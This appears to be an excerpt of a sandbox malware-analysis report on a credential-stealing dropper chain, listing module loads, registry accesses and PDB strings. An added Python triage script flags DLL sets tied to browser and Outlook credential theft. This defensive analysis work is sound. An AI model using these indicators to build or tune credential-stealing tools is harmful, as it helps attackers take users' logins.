                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fhsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msidle.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fhcfg.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: efsutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncasvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: httpprxp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wpdbusenum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceconnectapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | Section loaded (in order, repeats kept): apphelp.dll, acgenral.dll, uxtheme.dll, winmm.dll, samcli.dll, msacm32.dll, version.dll, userenv.dll, dwmapi.dll, urlmon.dll, mpr.dll, sspicli.dll, winmmbase.dll, winmmbase.dll, iertutil.dll, srvcli.dll, netutils.dll, aclayers.dll, sfc.dll, sfc_os.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Section loaded (in order, repeats kept): apphelp.dll, winhttp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dpapi.dll, cryptbase.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll, vcruntime140.dll, uxtheme.dll, propsys.dll, linkinfo.dll, windowscodecs.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Section loaded (in order, repeats kept): apphelp.dll, winhttp.dll, msimg32.dll, msvcr100.dll, mswsock.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, windows.staterepositoryps.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Section loaded (in order, repeats kept): apphelp.dll, acgenral.dll, uxtheme.dll, winmm.dll, samcli.dll, msacm32.dll, version.dll, userenv.dll, dwmapi.dll, urlmon.dll, mpr.dll, sspicli.dll, winmmbase.dll, winmmbase.dll, iertutil.dll, srvcli.dll, netutils.dll, aclayers.dll, sfc.dll, sfc_os.dll, drprov.dll, winsta.dll, ntlanman.dll, davclnt.dll, davhlpr.dll, kernel.appcore.dll, wbemcomn.dll, amsi.dll, profapi.dll, windows.storage.dll, wldp.dll, propsys.dll, windows.staterepositoryps.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, ntmarta.dll
                        Source: C:\Windows\SysWOW64\forfiles.exe | Section loaded (in order, repeats kept): apphelp.dll, version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in order, repeats kept): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Section loaded (in order, repeats kept): iphlpapi.dll, framedynos.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, msxml6.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, uxtheme.dll, vcruntime140.dll, amsi.dll, userenv.dll, profapi.dll, version.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Section loaded (in order, repeats kept): apphelp.dll, winhttp.dll, msimg32.dll, msvcr100.dll, mswsock.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, windows.staterepositoryps.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe | Section loaded (in order, repeats kept): apphelp.dll, winhttp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll
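The module-load events above are the report's raw per-process log, one event per line, and they are easier to read per process than per event. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it groups such lines by process and applies a few triage heuristics. The indicator sets are the example's own assumptions (Mozilla NSS libraries such as mozglue.dll together with dpapi.dll, ncrypt.dll and rstrtmgr.dll read as a browser credential-access pattern; winhttp/wininet as network capability; wbemcomn.dll as a WMI client; amsi.dll as content submitted to AMSI), and the sample input is a handful of lines copied from this list and marked as constructed. Run against the full list, it separates the two Temp executables u5v8.0.exe and u69w.0.exe, which both load wininet, rstrtmgr and ncrypt and, in the case of u5v8.0.exe, dpapi plus the non-Windows mozglue.dll, from processes such as svchost.exe or forfiles.exe whose loads are unremarkable.

```python
"""Group Joe Sandbox "Section loaded" events per process and flag DLL combinations
that merit a closer look. Heuristic triage aid; the indicator sets are this
example's assumptions, not rules taken from the report."""
import re

# Constructed sample: a handful of lines copied from the report's list, in the
# flattened form of the HTML export (no separator before "Section loaded").
SAMPLE_LINES = r"""
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: wbemcomn.dll
"""

# Accepts both the flattened export and a "Source: ... | Section loaded: ..." layout.
_EVENT = re.compile(
    r"^\s*Source:\s*(?P<src>.+?\.exe)[\s|]*Section loaded:\s*(?P<dll>\S+)", re.I
)

# Indicator sets (assumptions of this example).
_CRED = {
    "mozglue.dll", "nss3.dll", "softokn3.dll", "freebl3.dll",  # Mozilla NSS: not a Windows component,
                                                               # bundled by stealers to read Firefox logins
    "dpapi.dll", "ncrypt.dll",                                 # DPAPI / CNG decryption of browser key material
    "rstrtmgr.dll",                                            # Restart Manager: frees locks on open browser DBs
}
_NET = {"winhttp.dll", "wininet.dll", "ws2_32.dll", "wsock32.dll"}
_WMI = {"wbemcomn.dll"}   # WMI client library
_AMSI = {"amsi.dll"}      # process handed script or WMI content to AMSI


def parse_section_loads(text):
    """Return {process path: [dll, ...]} in load order; repeated loads are kept."""
    loads = {}
    for line in text.splitlines():
        m = _EVENT.match(line)
        if m:
            loads.setdefault(m["src"], []).append(m["dll"].lower())
    return loads


def flag_process(dlls):
    """Map one process's DLL list to a set of triage flags."""
    seen = set(dlls)
    flags = set()
    if len(seen & _CRED) >= 2:      # a single hit is too common to be meaningful
        flags.add("credential-access")
    if seen & _NET:
        flags.add("network")
    if seen & _WMI:
        flags.add("wmi-client")
    if seen & _AMSI:
        flags.add("amsi")
    return flags


def triage(text):
    """{process path: (number of loads, flags)} for every process in the excerpt."""
    return {src: (len(dlls), flag_process(dlls))
            for src, dlls in parse_section_loads(text).items()}


if __name__ == "__main__":
    for src, (n, flags) in triage(SAMPLE_LINES).items():
        print(f"{src}\n    {n} loads  flags={sorted(flags) or '-'}")
```

Paste the whole "Section loaded" list into SAMPLE_LINES (or read it from a file) to triage every process in the report; the per-process flags are a starting point for which processes to pull memory dumps and network captures for, not a verdict.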
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File written: C:\Windows\System32\GroupPolicy\gpt.ini
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
                        Source: file.exe | Static file information: File size 3428696 > 1048576
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: file.exe | Static PE information: Raw size of .managed is bigger than: 0x100000 < 0x14be00
                        Source: file.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x12fc00
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: appidpolicyconverter.pdbOGPS source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: XC:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xuzajoraxiy_20\kolazuto93\rimixosugixe lerofulugo\d.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444036361.000000000418C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1446288176.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1450570795.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448867855.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1449341280.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004221000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.000000000417B000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041EC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448071216.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004203000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006C5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: hh.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: hh.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xopuxokusi 56_texag poxibivo\tajicewudok\gosicuk_84\cifafu.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484213650.0000000004B63000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483831434.00000000041CC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: appidpolicyconverter.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: GC:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: &SC:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 
9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp
                        Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: C:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmp
